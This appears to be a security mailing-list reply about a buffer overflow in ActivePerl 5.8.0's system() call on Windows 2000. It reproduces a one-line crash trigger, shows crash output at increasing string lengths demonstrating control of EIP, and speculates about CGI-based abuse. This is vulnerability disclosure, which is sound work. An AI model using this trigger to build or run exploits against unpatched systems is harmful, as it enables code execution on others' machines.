"Oliver@xxxxxxxxxx" <Oliver@xxxxxxxxxx> wrote: > i played around with ActiveState's ActivePerl for Win32, and crashed > Perl.exe with the following command: > > perl -e "$a="A" x 256; system($a)" Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus all but last week's security patch: perl -e "$a="A" x 256; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x00657865. The memory could not be "written". Also, it is likely exploitable -- push up the number of A's a bit: C:\>perl -e "$a="A" x 259; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x65004141. The memory could not be "written". and we seem to get control of EIP. Coincidence? Try yet two more: C:\>perl -e "$a="A" x 261; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x41414141. The memory could not be "written". Looks like full control of EIP... However, there is not likely to be a privilege escalation here unless perhaps a script processor on a web server can be cajoled into doing something with this?? (Not at all familiar with the innards of Windows web servers and their relationship to their CGI, etc processors...) -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854
